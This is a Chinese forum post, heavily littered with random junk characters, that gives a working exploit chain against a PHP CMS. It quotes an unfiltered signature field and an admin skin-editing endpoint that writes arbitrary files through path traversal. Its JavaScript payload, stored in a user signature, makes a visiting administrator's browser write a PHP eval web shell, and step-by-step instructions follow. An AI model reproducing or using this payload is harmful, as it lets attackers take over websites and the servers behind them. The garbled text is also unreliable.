|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题. g: F. Y. b: ^
官网已经修补了,所以重新下了源码" N- p1 u' q# b& g
因为 后台登入 还需要认证码 所以 注入就没看了。
. R4 z4 F! i3 G8 `, a$ A9 q存在 xss8 k0 b5 H4 v2 j
漏洞文件 user/member/skin_edit.php
g1 h+ X8 a7 i* Y% }本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:* V) j- L W" N# `* W( i* ^
1 h% Y' ?- o; t" }# i
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
3 z. [* b/ \- _ - D1 `, j9 S! v( D
</textarea></td></tr>
' g3 W2 T: G: G8 Z2 J 0 {- O1 q# |: V
user/do.php
" t8 p) A3 h* y1 F
1 b" D; M5 I1 `* W/ O9 f
4 g" ?; l* X+ N8 `if($op=='zl'){ //资料
, M A! o' Q7 L4 t: j 1 @5 K2 u B# P6 t" v4 g
if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email)) ; l X+ e1 D: v. Z1 }
exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);')); H5 R& Z6 ^' D
5 Z% F$ E5 a9 O9 ~+ M! }
$sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',1 [& \) p! r: P) l/ \3 q: W
7 Y, g9 ^# G: f" B
CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'* r/ R G2 o( e: |
where CS_Name='".$cscms_name."'";& N; o/ w9 Y* X3 g
$ C& Q1 ] T; n- |1 ]9 o, F if($db->query($sql)){6 X/ ^9 W2 `5 i5 g$ U
+ A9 L3 F5 \9 _. D; T8 k
exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));
: J/ _, U0 [! y, K+ Q$ o ! {6 v. n9 |2 z
}else{
) R3 w/ }/ o1 T/ s: n+ k; D/ N2 P
- K. [3 f ?# _: M exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));. m" ?; z, F/ y& n! i0 }/ n
# L$ i8 B# P6 F8 Y+ l5 D! c
}- M; W& Y. Y5 s0 h7 G
; p/ p5 e4 c. S6 w; L6 S5 }; c2 l8 u; d
2 ? m0 e: z- d" _$ u6 x
没有 过滤导致xss产生。/ j, \ s7 [$ M$ P0 k7 t& b% I6 e% b
后台 看了下 很奇葩的是可以写任意格式文件。。
! U0 |% a9 ]& H: C. O抓包。。6 T+ \* B2 H. y/ D3 j. P# K
6 B! q" H+ ^4 ]( d& z J _9 z4 ~1 v1 x( R4 \, B2 x6 n3 E
本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1) z+ b# b3 C5 F5 \4 N4 H
( @" L* }3 X; Z' E$ H! `" v& F
Accept: text/html, application/xhtml+xml, */*
" k8 C* |7 S5 q+ S" Z. n8 T . q2 t0 N$ W0 w U: z3 L
Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php1 D( k) N( F- N
& b1 S. k! h, ^% s. A7 o( p
Accept-Language: zh-CN$ l) ]6 A6 g3 _! r" [+ y2 t+ v0 w
0 x) @/ X& y: HUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
`7 b6 z' j6 P0 h
# B' h$ q7 j; U; R* G' d1 {' yContent-Type: application/x-www-form-urlencoded
+ p5 o3 c n8 K0 s4 s. N( x
4 T' E2 s: w* j# X8 T: rAccept-Encoding: gzip, deflate0 F7 h% H, a% {7 O" G) c7 k
7 W0 q: q5 t9 ^# oHost: 127.0.0.1# K1 C" [. i# R( [1 k; B
+ w/ l4 D& X9 t' d! A$ c" V# ^Content-Length: 38
. G8 N; O% H! k7 [* ^; _ ]7 v; S0 I7 P; l
DNT: 1: C* j" b- b/ [) X/ W$ e/ K
$ \* g$ X/ l6 Z) Q+ n3 g' c
Connection: Keep-Alive9 {4 S& ~& H% b# L. J9 o% L8 Z
4 w( U, K2 D% y. z) K" u6 k
Cache-Control: no-cache7 q/ p* S: f% u4 u' k! ?. ?
7 ~4 Q/ G4 m6 r. `1 p. \
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f655949 i% Z$ y& @8 [. O6 S' ~
* z+ J9 j5 j% L9 e G
, l! T2 h- f* I: ^) L/ Ename=aaa.php&content=%3Cs%3E%3Ca%25%3E
0 ?5 `0 G' U x% s+ H
. L, P- Q' V. t/ k$ |! U: W7 l3 L) p
$ ]% i& v- Q/ X+ }2 Z
于是 构造js如下。4 o! T/ r( v/ Y l* H
& \6 ]( _1 I2 B5 d! F v. i
本帖隐藏的内容<script> + F q: q, U* K: V
thisTHost = top.location.hostname;8 y+ t+ x: [) k( G0 E- Y
5 I( b4 V& i* g6 D- t
thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
O8 h$ B! V9 Q8 \ 1 a. P0 @- G8 A9 H- i# ]
function PostSubmit(url, data, msg) { ( J! ?! h3 f4 m6 }
var postUrl = url;
+ P+ O8 v: C5 S1 C7 }( p
" S1 h; }/ G* E- U/ @ var postData = data;
" J! k! N8 g" \" a& l! l1 O ]+ G/ z var msgData = msg;
6 N9 y7 V! K1 w9 z var ExportForm = document.createElement("FORM");
9 B1 O, x! J, O1 t; a$ y; E1 j. W( h1 T document.body.appendChild(ExportForm);
- f) M# g# c/ ^4 X, o ExportForm.method = "POST"; + _: ]2 N" |% Z: K0 V3 D' I
var newElement = document.createElement("input"); . [0 j$ R* Q3 G- J
newElement.setAttribute("name", "name");
& Q+ C6 E6 Y2 w' N7 F newElement.setAttribute("type", "hidden"); : R8 s5 E7 ]! H6 g5 `5 T
var newElement2 = document.createElement("input");
5 R0 v+ G r7 F newElement2.setAttribute("name", "content"); # `5 `8 i- D+ K3 U* m' l
newElement2.setAttribute("type", "hidden");
* x5 P; I9 T2 |+ R4 @0 ~+ m6 A* f ExportForm.appendChild(newElement); & {7 s4 ^+ v9 E W" Q
ExportForm.appendChild(newElement2);
3 \; ?5 S9 V3 [6 H newElement.value = postData; 3 V1 K, e( H+ r
newElement2.value = msgData;
# P" u4 F2 z) M0 {0 G ExportForm.action = postUrl;
, m3 t. U3 w* I5 j5 O/ E6 p v ExportForm.submit(); 3 x% g9 H2 H" A8 s$ m% t
};
! K4 u4 N$ w: }' v# p
5 X4 ?8 W* Q+ R7 s; v Q. cPostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
) ?- ]3 Y' r6 N5 d0 F 4 Z+ }, s/ m7 p( B
</script>
: U$ C. k& j* v6 n8 W
1 p9 l& x4 I, E3 z5 K9 P& E1 |9 z
3 g9 L; j% y- t/ r0 d0 I8 @
% {% A ] f$ y) C/ p! h3 Hhttp://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入
" Q" ^) l. X' X. z用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)
% p: k, a# d6 V4 }8 k% l就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
- r2 d' g6 H- I. W$ b- Q+ T
|
|
发表于 2013-11-6 18:09:37
收藏
支持
反对